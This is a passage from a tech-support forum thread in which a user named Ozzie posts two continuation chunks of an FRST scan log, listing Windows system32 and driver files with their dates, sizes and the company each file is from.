Author Topic: File Type Question  (Read 20173 times)

Ozzie
Re: File Type Question
« Reply #30 on: January 25, 2017, 08:55:57 PM »
16th continuation of FRST

2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ThumbnailExtractionHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\tapilua.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxssrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\netcfg.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\licmgr10.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipconfig.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\hidserv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\findstr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\extrac32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevQueryBroker.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSoftwareInstallationClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\choice.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cnghwassist.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\WofUtil.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.WebPlatform.SecurityBroker.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpgradeResultsUI.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\proquota.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhf.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00034576 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_02_1969.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Diskdump.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcnsh.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwsso.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\RNDISMP.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmOmaCpMo.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzSqlExt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034064 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveTask.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\shimgvw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\ndproxystub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\luiapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnscacheugc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmNotificationBroker.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\cofiredm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winrnr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\userinit.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\httpapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\fsutilext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsparse.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmprocessxmlfiltered.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\cacls.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthTelemetry.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033040 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationFrameworkPS.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033040 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_0C_8086.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\syskey.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ifmon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ias.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbrpm.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdlg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthpanapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\atlthunk.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032544 _____ (Microsoft Corporation) C:\WINDOWS\system32\imaadp32.acm
2016-12-03 08:34 - 2016-12-03 08:34 - 00032416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mrt_map.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAgent.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\nsisvc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FaxPrinterInstaller.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032016 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfpmp.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031992 _____ (Microsoft Corporation) C:\WINDOWS\system32\reguwpapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031992 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdmo.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mrt100.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft) C:\WINDOWS\system32\usk.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.TimeBroker.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ureg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\timeout.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxdm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msisip.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\fltMC.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\elsTrans.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsdport.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDOIProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscdll.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\APHostRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031504 _____ (Microsoft Corporation) C:\WINDOWS\system32\SDFHost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wimmount.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Dumpata.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msadp32.acm
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\shunimpl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\RpcPing.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpupdate.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdWNet.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tape.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msfs.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Dot3Conn.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\clip.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\cliconfg.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\at.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmiprop.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModelShim.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcalua.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAMRNBSink.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\mciwave.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmpbk32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\SpatialGraphFilter.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToStatusProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxsstore.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\setspn.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlmproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\mciseq.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\easinvoker.proxystub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairingProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\bi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeevts.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shgina.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\prevhost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.drv
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\MemoryDiagnostic.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmoleaututils.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\dispex.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\CheckNetIsolation.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00029432 _____ (Microsoft Corporation) C:\WINDOWS\system32\winnsi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029432 _____ (Microsoft Corporation) C:\WINDOWS\system32\avrt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\DsmUserTask.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmdext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallButtons.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfvfw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\winrshost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.SystemManufacturers.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wephostsvc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\msyuv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\lmhsvc.dll

Offline Ozzie

Re: File Type Question
« Reply #31 on: January 25, 2017, 08:57:07 PM »
17th continuation of FRST

2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\dswave.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\asyncmac.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00028432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WppRecorder.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00028376 _____ (Microsoft Corporation) C:\WINDOWS\system32\CameraSettingsUIHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscisvif.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\secur32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnrpauto.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\more.com
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027960 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptbase.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fs_rec.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00027864 _____ (Microsoft Corporation) C:\WINDOWS\system32\version.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\winusb.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WINSRPC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\icmui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEject.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\davhlpr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidtel.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027352 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VaultCmd.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdown.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\osbaseln.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncuprov.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\nativemap.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmutil.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\DefaultPrinterProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026896 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdcom.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhv.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ C:\WINDOWS\system32\GamePanelExternalHook.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\vdsldr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysntfy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SetNetworkLocation.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdiagnhost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\netbtugc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\gptext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscTimer.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vwifibus.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ARP.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdbinst.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfnet.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\NcdProp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\NcaApi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\midimap.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndistapi.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksthunk.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\diskperf.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\chkwudrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\bitsperf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025872 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_02_19a2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025872 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_02_10df.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\CSystemEventsBrokerClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\comp.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\chkdsk.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\AJRouter.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hwpolicy.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00025360 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDACLSys.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsrole.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sort.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\serwvdrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\FileAppxStreamingDataSource.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\fc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\credssp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024752 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsRemoveDevice.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\xmlprovi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshcon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedcli.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ROUTE.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Register-CimProvider.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ktmw32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\easconsent.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbnmpntw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cofire.exe
